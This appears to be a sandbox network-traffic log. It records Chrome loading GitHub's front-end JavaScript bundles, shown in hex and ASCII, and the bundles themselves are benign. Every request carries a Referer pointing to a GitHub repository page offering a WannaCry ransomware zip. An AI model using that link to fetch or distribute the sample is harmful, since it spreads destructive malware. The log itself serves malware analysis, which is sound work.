                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 6f 41 72 72 61 79 28 72 29 2e 6d 61 70 28 65 3d 3e 6e 2e 69 73 56 61 6c 69 64 45 6c 65 6d 65 6e 74 28 65 29 26 26 28 65 2e 70 72 6f 70 73 2e 64 65 66 61 75 6c 74 53 65 6c 65 63 74 65 64 7c 7c 65 2e 70 72 6f 70 73 2e 73 65 6c 65 63 74 65 64 29 29 2c 43 3d 79 2e 73 6f 6d 65 28 65 3d 3e 65 29 2c 53 3d 43 3f 79 2e 69 6e 64 65 78 4f 66 28 21 30 29 3a 30 2c 5b 50 2c 4e 5d 3d 28 30 2c 6e 2e 75 73 65 53 74 61 74 65 29 28 53 29 2c 7a 3d 67 3f 50 3a 53 2c 56 3d 6e 2e 69 73 56 61 6c 69 64 45 6c 65 6d 65 6e 74 28 6e 2e 43 68 69 6c 64 72 65 6e 2e 74 6f 41 72 72 61 79 28 72 29 5b 7a 5d 29 3f 6e 2e 43 68 69 6c 64 72 65 6e 2e 74 6f 41 72 72 61 79 28 72 29 5b 7a 5d 3a 76 6f 69 64 20 30 2c 49 3d 65 3d 3e 6e 2e 69 73 56 61 6c 69 64 45 6c 65 6d 65 6e 74 28 65 29 26 26 65 2e
                                                                                      Data Ascii: oArray(r).map(e=>n.isValidElement(e)&&(e.props.defaultSelected||e.props.selected)),C=y.some(e=>e),S=C?y.indexOf(!0):0,[P,N]=(0,n.useState)(S),z=g?P:S,V=n.isValidElement(n.Children.toArray(r)[z])?n.Children.toArray(r)[z]:void 0,I=e=>n.isValidElement(e)&&e.


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      61192.168.2.1649765185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:25 UTC736OUTGET /assets/ui_packages_react-core_create-browser-history_ts-ui_packages_react-core_AppContextProvider_ts-809ab9-4a2cf4ad7f60.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:25 UTC686INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 6853
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Wed, 06 Mar 2024 18:42:25 GMT
                                                                                      ETag: 0x8DC3E0D2B0430BA
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:25 GMT
                                                                                      Age: 1299290
                                                                                      X-Served-By: cache-iad-kcgs7200090-IAD, cache-ewr18124-EWR
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 73, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: faaaeef8530e3fd57262e046fd4ab27f8976237d
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 75 69 5f 70 61 63 6b 61 67 65 73 5f 72 65 61 63 74 2d 63 6f 72 65 5f 63 72 65 61 74 65 2d 62 72 6f 77 73 65 72 2d 68 69 73 74 6f 72 79 5f 74 73 2d 75 69 5f 70 61 63 6b 61 67 65 73 5f 72 65 61 63 74 2d 63 6f 72 65 5f 41 70 70 43 6f 6e 74 65 78 74 50 72 6f 76 69 64 65 72 5f 74 73 2d 38 30 39 61 62 39 22 5d 2c 7b 34 37 36 35 38 3a 28 65 2c 74 2c 72 29 3d 3e 7b 72 2e 64 28 74 2c 7b 6e 3a 28 29 3d 3e 6f 7d 29 3b 76 61 72 20 61 3d 72 28 38 35 38 39 33 29 2c 6e 3d 72 28 36 37 32 39 34 29 2c 73 3d 72 28 31 35 34 37 30 29 3b 66 75 6e 63 74 69
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["ui_packages_react-core_create-browser-history_ts-ui_packages_react-core_AppContextProvider_ts-809ab9"],{47658:(e,t,r)=>{r.d(t,{n:()=>o});var a=r(85893),n=r(67294),s=r(15470);functi
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 76 65 20 6c 69 73 74 65 6e 65 72 22 29 3b 72 65 74 75 72 6e 20 74 3d 65 2c 28 29 3d 3e 7b 74 3d 76 6f 69 64 20 30 7d 7d 2c 62 6c 6f 63 6b 3a 65 3d 3e 28 6e 2e 70 75 73 68 28 65 29 2c 28 29 3d 3e 7b 6e 3d 6e 2e 66 69 6c 74 65 72 28 74 3d 3e 74 21 3d 3d 65 29 7d 29 7d 7d 7d 2c 31 38 34 34 38 3a 28 65 2c 74 2c 72 29 3d 3e 7b 72 2e 64 28 74 2c 7b 74 3a 28 29 3d 3e 61 7d 29 3b 6c 65 74 20 61 3d 7b 22 57 6f 72 6b 65 72 73 20 6e 6f 74 20 72 65 61 64 79 22 3a 22 41 6c 6c 6f 79 20 69 73 20 77 61 72 6d 69 6e 67 20 69 74 73 20 77 6f 72 6b 65 72 73 2e 20 54 68 69 73 20 69 73 20 65 78 70 65 63 74 65 64 20 64 75 72 69 6e 67 20 64 65 70 6c 6f 79 73 20 61 6e 64 20 73 68 6f 75 6c 64 20 72 65 73 6f 6c 76 65 20 73 68 6f 72 74 6c 79 2e 22 7d 7d 2c 32 32 38 37 37 3a 28 65 2c
                                                                                      Data Ascii: ve listener");return t=e,()=>{t=void 0}},block:e=>(n.push(e),()=>{n=n.filter(t=>t!==e)})}}},18448:(e,t,r)=>{r.d(t,{t:()=>a});let a={"Workers not ready":"Alloy is warming its workers. This is expected during deploys and should resolve shortly."}},22877:(e,
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 65 2e 64 61 74 61 73 65 74 29 29 3b 72 65 74 75 72 6e 28 30 2c 6c 2e 75 73 65 45 66 66 65 63 74 29 28 28 29 3d 3e 7b 6c 65 74 20 74 3d 6e 65 77 20 4d 75 74 61 74 69 6f 6e 4f 62 73 65 72 76 65 72 28 28 29 3d 3e 72 28 63 28 65 2e 64 61 74 61 73 65 74 29 29 29 3b 72 65 74 75 72 6e 20 74 2e 6f 62 73 65 72 76 65 28 65 2c 7b 61 74 74 72 69 62 75 74 65 73 3a 21 30 2c 61 74 74 72 69 62 75 74 65 46 69 6c 74 65 72 3a 5b 22 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 22 2c 22 64 61 74 61 2d 6c 69 67 68 74 2d 74 68 65 6d 65 22 2c 22 64 61 74 61 2d 64 61 72 6b 2d 74 68 65 6d 65 22 5d 7d 29 2c 28 29 3d 3e 74 2e 64 69 73 63 6f 6e 6e 65 63 74 28 29 7d 2c 5b 65 5d 29 2c 74 7d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 28 61 7c 7c 7b 7d 29 7d 3b 76 61 72
                                                                                      Data Ascii: e.dataset));return(0,l.useEffect)(()=>{let t=new MutationObserver(()=>r(c(e.dataset)));return t.observe(e,{attributes:!0,attributeFilter:["data-color-mode","data-light-theme","data-dark-theme"]}),()=>t.disconnect()},[e]),t}:function(){return c(a||{})};var
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 3a 5b 28 30 2c 61 2e 6a 73 78 29 28 22 73 70 61 6e 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 54 6f 61 73 74 2d 69 63 6f 6e 22 2c 63 68 69 6c 64 72 65 6e 3a 72 7c 7c 64 5b 73 5d 7d 29 2c 28 30 2c 61 2e 6a 73 78 29 28 22 73 70 61 6e 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 54 6f 61 73 74 2d 63 6f 6e 74 65 6e 74 22 2c 63 68 69 6c 64 72 65 6e 3a 65 7d 29 5d 7d 29 7d 29 7d 29 7d 3b 74 72 79 7b 75 2e 64 69 73 70 6c 61 79 4e 61 6d 65 7c 7c 28 75 2e 64 69 73 70 6c 61 79 4e 61 6d 65 3d 22 54 6f 61 73 74 22 29 7d 63 61 74 63 68 7b 7d 66 75 6e 63 74 69 6f 6e 20 68 28 29 7b 6c 65 74 7b 74 6f 61 73 74 73 3a 65 2c 70 65 72 73 69 73 74 65 64 54 6f 61 73 74 3a 74 7d 3d 28 30 2c 6e 2e 75 73 65 43 6f 6e 74 65 78 74 29 28 73 2e 57 77 29 3b 72 65 74 75 72 6e 28 30 2c 61 2e
                                                                                      Data Ascii: :[(0,a.jsx)("span",{className:"Toast-icon",children:r||d[s]}),(0,a.jsx)("span",{className:"Toast-content",children:e})]})})})};try{u.displayName||(u.displayName="Toast")}catch{}function h(){let{toasts:e,persistedToast:t}=(0,n.useContext)(s.Ww);return(0,a.
                                                                                      2024-03-23 14:47:25 UTC1341INData Raw: 26 26 61 28 22 43 6c 69 65 6e 74 52 65 6e 64 65 72 22 29 7d 2c 5b 72 5d 29 2c 28 30 2c 6e 2e 6a 73 78 29 28 69 2e 50 72 6f 76 69 64 65 72 2c 7b 76 61 6c 75 65 3a 72 2c 63 68 69 6c 64 72 65 6e 3a 74 7d 29 7d 74 72 79 7b 69 2e 64 69 73 70 6c 61 79 4e 61 6d 65 7c 7c 28 69 2e 64 69 73 70 6c 61 79 4e 61 6d 65 3d 22 52 65 6e 64 65 72 50 68 61 73 65 43 6f 6e 74 65 78 74 22 29 7d 63 61 74 63 68 7b 7d 74 72 79 7b 63 2e 64 69 73 70 6c 61 79 4e 61 6d 65 7c 7c 28 63 2e 64 69 73 70 6c 61 79 4e 61 6d 65 3d 22 52 65 6e 64 65 72 50 68 61 73 65 50 72 6f 76 69 64 65 72 22 29 7d 63 61 74 63 68 7b 7d 7d 2c 38 38 30 34 39 3a 28 65 2c 74 2c 72 29 3d 3e 7b 72 2e 64 28 74 2c 7b 56 36 3a 28 29 3d 3e 68 2c 57 77 3a 28 29 3d 3e 64 2c 68 77 3a 28 29 3d 3e 69 2c 73 53 3a 28 29 3d 3e
                                                                                      Data Ascii: &&a("ClientRender")},[r]),(0,n.jsx)(i.Provider,{value:r,children:t})}try{i.displayName||(i.displayName="RenderPhaseContext")}catch{}try{c.displayName||(c.displayName="RenderPhaseProvider")}catch{}},88049:(e,t,r)=>{r.d(t,{V6:()=>h,Ww:()=>d,hw:()=>i,sS:()=>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      62192.168.2.1649766185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:25 UTC674OUTGET /assets/ui_packages_react-core_register-app_ts-3208e4c5b7c1.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:25 UTC687INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 19159
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Tue, 19 Mar 2024 19:37:00 GMT
                                                                                      ETag: 0x8DC484BF21689B3
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:25 GMT
                                                                                      Age: 260292
                                                                                      X-Served-By: cache-iad-kjyo7100166-IAD, cache-ewr18157-EWR
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 197, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: 42058ce01bad1b264b69897b14cbc9195f7077f5
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 75 69 5f 70 61 63 6b 61 67 65 73 5f 72 65 61 63 74 2d 63 6f 72 65 5f 72 65 67 69 73 74 65 72 2d 61 70 70 5f 74 73 22 5d 2c 7b 38 30 38 31 30 3a 28 74 2c 65 2c 72 29 3d 3e 7b 72 2e 64 28 65 2c 7b 4e 3a 28 29 3d 3e 6e 2c 78 3a 28 29 3d 3e 6f 7d 29 3b 76 61 72 20 61 3d 72 28 37 31 32 30 37 29 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 74 2c 65 29 7b 6f 28 28 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 6c 61 62 65 6c 22 29 7c 7c 74 2e 69 6e 6e 65 72 54 65 78 74 7c 7c 22 22 29 2e 74 72 69 6d 28 29 2c 65 29 7d 66 75 6e 63 74 69
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["ui_packages_react-core_register-app_ts"],{80810:(t,e,r)=>{r.d(e,{N:()=>n,x:()=>o});var a=r(71207);function n(t,e){o((t.getAttribute("aria-label")||t.innerText||"").trim(),e)}functi
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 29 3b 66 6f 72 28 6c 65 74 5b 74 2c 72 5d 6f 66 20 61 29 75 2e 69 6e 63 6c 75 64 65 73 28 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 26 26 28 65 5b 74 5d 3d 72 29 3b 72 65 74 75 72 6e 20 65 2e 73 74 61 66 66 3d 28 30 2c 73 2e 42 29 28 29 2e 74 6f 53 74 72 69 6e 67 28 29 2c 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 65 2c 74 29 7d 66 75 6e 63 74 69 6f 6e 20 68 28 74 29 7b 61 3f 2e 73 65 6e 64 50 61 67 65 56 69 65 77 28 64 28 74 29 29 7d 66 75 6e 63 74 69 6f 6e 20 70 28 74 2c 65 3d 7b 7d 29 7b 6c 65 74 20 72 3d 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 3f 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 27 6d 65 74 61 5b 6e 61 6d 65
                                                                                      Data Ascii: =new URLSearchParams(window.location.search);for(let[t,r]of a)u.includes(t.toLowerCase())&&(e[t]=r);return e.staff=(0,s.B)().toString(),Object.assign(e,t)}function h(t){a?.sendPageView(d(t))}function p(t,e={}){let r=document.head?.querySelector('meta[name
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 3d 3e 24 7d 29 3b 76 61 72 20 61 3d 72 28 38 33 32 30 36 29 3b 6c 65 74 20 6e 3d 6e 65 77 20 61 2e 65 3b 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 20 6f 28 74 29 7b 6c 65 74 20 65 3d 61 77 61 69 74 20 6e 2e 67 65 74 52 65 67 69 73 74 72 61 74 69 6f 6e 28 74 29 3b 72 65 74 75 72 6e 20 65 28 29 7d 76 61 72 20 69 3d 72 28 38 35 38 39 33 29 2c 73 3d 72 28 37 36 30 30 36 29 2c 6c 3d 72 28 31 32 35 39 39 29 2c 63 3d 72 28 36 37 32 39 34 29 2c 75 3d 72 28 36 39 37 38 38 29 2c 64 3d 72 28 37 39 36 30 30 29 3b 6c 65 74 20 68 3d 28 74 2c 65 29 3d 3e 6e 75 6c 6c 21 3d 3d 74 26 26 6e 75 6c 6c 21 3d 3d 65 26 26 74 2e 70 61 74 68 6e 61 6d 65 3d 3d 3d 65 2e 70 61 74 68 6e 61 6d 65 26 26 74 2e 73 65 61 72 63 68 3d 3d 3d 65 2e 73 65 61 72 63 68 26 26 21 21 65 2e 68 61 73
                                                                                      Data Ascii: =>$});var a=r(83206);let n=new a.e;async function o(t){let e=await n.getRegistration(t);return e()}var i=r(85893),s=r(76006),l=r(12599),c=r(67294),u=r(69788),d=r(79600);let h=(t,e)=>null!==t&&null!==e&&t.pathname===e.pathname&&t.search===e.search&&!!e.has
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 69 66 28 61 3f 2e 74 72 61 6e 73 69 74 69 6f 6e 54 79 70 65 3d 3d 3d 75 2e 78 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 57 48 49 4c 45 5f 46 45 54 43 48 49 4e 47 26 26 74 68 69 73 2e 6e 61 76 69 67 61 74 65 57 69 74 68 6f 75 74 50 61 79 6c 6f 61 64 28 74 29 2c 61 3f 2e 74 72 61 6e 73 69 74 69 6f 6e 54 79 70 65 3d 3d 3d 75 2e 78 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 57 49 54 48 4f 55 54 5f 46 45 54 43 48 29 7b 74 68 69 73 2e 6e 61 76 69 67 61 74 65 57 69 74 68 6f 75 74 50 61 79 6c 6f 61 64 28 74 29 3b 72 65 74 75 72 6e 7d 74 68 69 73 2e 65 6e 74 65 72 4c 6f 61 64 69 6e 67 53 74 61 74 65 28 74 29 3b 6c 65 74 20 6e 3d 61 77 61 69 74 20 61 3f 2e 63 6f 72 65 4c 6f 61 64 65 72 28 7b 6c 6f 63 61 74 69 6f 6e 3a 74 2e 6c 6f 63 61 74 69 6f 6e 2c 70 61 74 68 50 61 72 61 6d
                                                                                      Data Ascii: if(a?.transitionType===u.x.TRANSITION_WHILE_FETCHING&&this.navigateWithoutPayload(t),a?.transitionType===u.x.TRANSITION_WITHOUT_FETCH){this.navigateWithoutPayload(t);return}this.enterLoadingState(t);let n=await a?.coreLoader({location:t.location,pathParam
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 72 72 65 6e 74 50 61 79 6c 6f 61 64 28 74 29 7b 6c 65 74 20 65 3d 74 68 69 73 2e 73 74 61 74 65 2e 6c 6f 63 61 74 69 6f 6e 2e 6b 65 79 2c 72 3d 65 2b 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 2c 61 3d 7b 2e 2e 2e 74 2e 6c 6f 63 61 74 69 6f 6e 2c 6b 65 79 3a 72 7d 2c 6e 3d 7b 2e 2e 2e 74 68 69 73 2e 73 74 61 74 65 2e 72 6f 75 74 65 53 74 61 74 65 4d 61 70 2c 5b 72 5d 3a 74 68 69 73 2e 73 74 61 74 65 2e 72 6f 75 74 65 53 74 61 74 65 4d 61 70 5b 65 5d 7d 3b 74 68 69 73 2e 75 70 64 61 74 65 28 7b 2e 2e 2e 74 2c 6c 6f 63 61 74 69 6f 6e 3a 61 2c 72 6f 75 74 65 53 74 61 74 65 4d 61 70 3a 6e 2c 65 72 72 6f 72 3a 6e 75 6c 6c 7d 29 7d 6c 65 61 76 65 4c 6f 61 64 69 6e 67 53 74 61 74 65 57 69 74 68 52 6f 75 74 65 44 61 74 61 28 74 2c 65 2c 72 29 7b 74 68 69 73 2e
                                                                                      Data Ascii: rrentPayload(t){let e=this.state.location.key,r=e+t.location.hash,a={...t.location,key:r},n={...this.state.routeStateMap,[r]:this.state.routeStateMap[e]};this.update({...t,location:a,routeStateMap:n,error:null})}leaveLoadingStateWithRouteData(t,e,r){this.
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 6c 65 74 20 74 3d 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 67 65 74 45 6e 74 72 69 65 73 42 79 4e 61 6d 65 28 5f 29 2c 65 3d 74 2e 70 6f 70 28 29 3b 72 65 74 75 72 6e 20 65 3f 65 2e 64 75 72 61 74 69 6f 6e 3a 6e 75 6c 6c 7d 28 29 3b 65 26 26 28 30 2c 77 2e 62 29 28 7b 72 65 71 75 65 73 74 55 72 6c 3a 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2c 64 69 73 74 72 69 62 75 74 69 6f 6e 4b 65 79 3a 22 52 45 41 43 54 5f 4e 41 56 5f 44 55 52 41 54 49 4f 4e 22 2c 64 69 73 74 72 69 62 75 74 69 6f 6e 56 61 6c 75 65 3a 4d 61 74 68 2e 72 6f 75 6e 64 28 65 29 2c 64 69 73 74 72 69 62 75 74 69 6f 6e 54 61 67 73 3a 5b 22 52 45 41 43 54 5f 4e 41 56 5f 48 41 52 44 22 5d 7d 29 7d 2c 5f 3d 22 72 65 61 63 74 5f 6e 61 76 5f 64 75 72 61 74 69 6f
                                                                                      Data Ascii: let t=window.performance.getEntriesByName(_),e=t.pop();return e?e.duration:null}();e&&(0,w.b)({requestUrl:window.location.href,distributionKey:"REACT_NAV_DURATION",distributionValue:Math.round(e),distributionTags:["REACT_NAV_HARD"]})},_="react_nav_duratio
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 74 65 29 28 28 29 3d 3e 7b 6c 65 74 7b 61 70 70 50 61 79 6c 6f 61 64 3a 61 2c 2e 2e 2e 6e 7d 3d 65 3b 72 65 74 75 72 6e 20 6e 65 77 20 67 28 74 2c 7b 2e 2e 2e 6e 2c 65 6e 61 62 6c 65 64 5f 66 65 61 74 75 72 65 73 3a 61 3f 2e 65 6e 61 62 6c 65 64 5f 66 65 61 74 75 72 65 73 3f 61 2e 65 6e 61 62 6c 65 64 5f 66 65 61 74 75 72 65 73 3a 7b 7d 7d 2c 61 2c 72 29 7d 29 2c 5b 6e 2c 6f 5d 3d 28 30 2c 63 2e 75 73 65 53 74 61 74 65 29 28 28 29 3d 3e 61 2e 67 65 74 41 70 70 4e 61 76 69 67 61 74 69 6f 6e 53 74 61 74 65 28 29 29 2c 69 3d 28 30 2c 63 2e 75 73 65 52 65 66 29 28 21 31 29 3b 69 2e 63 75 72 72 65 6e 74 7c 7c 28 61 2e 73 65 74 41 70 70 4e 61 76 69 67 61 74 69 6f 6e 53 74 61 74 65 43 61 6c 6c 62 61 63 6b 28 6f 29 2c 69 2e 63 75 72 72 65 6e 74 3d 21 30 29 3b 6c
                                                                                      Data Ascii: te)(()=>{let{appPayload:a,...n}=e;return new g(t,{...n,enabled_features:a?.enabled_features?a.enabled_features:{}},a,r)}),[n,o]=(0,c.useState)(()=>a.getAppNavigationState()),i=(0,c.useRef)(!1);i.current||(a.setAppNavigationStateCallback(o),i.current=!0);l
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 2e 64 69 73 70 6c 61 79 4e 61 6d 65 3d 22 43 6c 69 65 6e 74 45 6e 74 72 79 22 29 7d 63 61 74 63 68 7b 7d 76 61 72 20 4d 3d 72 28 36 30 33 30 32 29 3b 6c 65 74 20 55 3d 63 6c 61 73 73 20 52 65 61 63 74 41 70 70 45 6c 65 6d 65 6e 74 20 65 78 74 65 6e 64 73 20 4d 2e 53 7b 61 73 79 6e 63 20 67 65 74 52 65 61 63 74 4e 6f 64 65 28 74 29 7b 6c 65 74 20 65 3d 74 68 69 73 2e 6e 61 6d 65 2c 72 3d 74 68 69 73 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 6e 69 74 69 61 6c 2d 70 61 74 68 22 29 2c 7b 41 70 70 3a 61 2c 72 6f 75 74 65 73 3a 6e 7d 3d 61 77 61 69 74 20 6f 28 65 29 3b 69 66 28 74 68 69 73 2e 69 73 4c 61 7a 79 29 7b 6c 65 74 20 65 3d 61 77 61 69 74 20 66 65 74 63 68 28 72 2c 7b 6d 6f 64 65 3a 22 6e 6f 2d 63 6f 72 73 22 2c 63 61 63 68 65 3a 22 6e 6f 2d 63
                                                                                      Data Ascii: .displayName="ClientEntry")}catch{}var M=r(60302);let U=class ReactAppElement extends M.S{async getReactNode(t){let e=this.name,r=this.getAttribute("initial-path"),{App:a,routes:n}=await o(e);if(this.isLazy){let e=await fetch(r,{mode:"no-cors",cache:"no-c
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 30 2c 61 2e 56 29 28 29 2c 65 3d 74 26 26 22 6c 6f 61 64 65 64 22 3d 3d 3d 74 2e 74 79 70 65 3f 74 2e 64 61 74 61 3a 76 6f 69 64 20 30 3b 72 65 74 75 72 6e 20 65 3f 2e 70 61 79 6c 6f 61 64 7d 7d 2c 38 32 39 31 34 3a 28 74 2c 65 2c 72 29 3d 3e 7b 72 2e 64 28 65 2c 7b 5a 3a 28 29 3d 3e 6c 7d 29 3b 76 61 72 20 61 3d 72 28 35 36 33 36 33 29 3b 6c 65 74 7b 67 65 74 49 74 65 6d 3a 6e 2c 73 65 74 49 74 65 6d 3a 6f 2c 72 65 6d 6f 76 65 49 74 65 6d 3a 69 7d 3d 28 30 2c 61 2e 5a 29 28 22 6c 6f 63 61 6c 53 74 6f 72 61 67 65 22 29 2c 73 3d 22 52 45 41 43 54 5f 50 52 4f 46 49 4c 49 4e 47 5f 45 4e 41 42 4c 45 44 22 2c 6c 3d 7b 65 6e 61 62 6c 65 3a 28 29 3d 3e 6f 28 73 2c 22 74 72 75 65 22 29 2c 64 69 73 61 62 6c 65 3a 28 29 3d 3e 69 28 73 29 2c 69 73 45 6e 61 62 6c 65
                                                                                      Data Ascii: 0,a.V)(),e=t&&"loaded"===t.type?t.data:void 0;return e?.payload}},82914:(t,e,r)=>{r.d(e,{Z:()=>l});var a=r(56363);let{getItem:n,setItem:o,removeItem:i}=(0,a.Z)("localStorage"),s="REACT_PROFILING_ENABLED",l={enable:()=>o(s,"true"),disable:()=>i(s),isEnable
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 3d 7b 7d 29 7b 69 66 28 21 6d 28 74 29 29 72 65 74 75 72 6e 3b 73 3d 30 3b 6c 65 74 20 65 3d 28 30 2c 69 2e 57 6c 29 28 29 7c 7c 69 2e 6a 4e 3b 64 6f 63 75 6d 65 6e 74 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 6e 65 77 20 6e 2e 51 57 28 28 30 2c 69 2e 47 6a 29 28 29 2c 65 29 29 2c 76 28 29 2c 28 30 2c 6f 2e 74 33 29 28 65 29 2c 28 30 2c 69 2e 58 4c 29 28 29 7d 66 75 6e 63 74 69 6f 6e 20 68 28 74 3d 7b 7d 29 7b 69 66 28 21 6d 28 74 29 29 72 65 74 75 72 6e 3b 6c 65 74 20 65 3d 28 30 2c 69 2e 47 6a 29 28 29 3b 76 28 29 2c 64 6f 63 75 6d 65 6e 74 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 6e 65 77 20 6e 2e 58 72 28 65 29 29 2c 28 30 2c 69 2e 70 53 29 28 29 2c 28 30 2c 69 2e 76 75 29 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 70 28 74 3d 7b 7d 29 7b 6d 28 74
                                                                                      Data Ascii: ={}){if(!m(t))return;s=0;let e=(0,i.Wl)()||i.jN;document.dispatchEvent(new n.QW((0,i.Gj)(),e)),v(),(0,o.t3)(e),(0,i.XL)()}function h(t={}){if(!m(t))return;let e=(0,i.Gj)();v(),document.dispatchEvent(new n.Xr(e)),(0,i.pS)(),(0,i.vu)(e)}function p(t={}){m(t


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      63192.168.2.1649768185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:25 UTC662OUTGET /assets/ui_packages_paths_index_ts-ea3e1b2a33c6.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
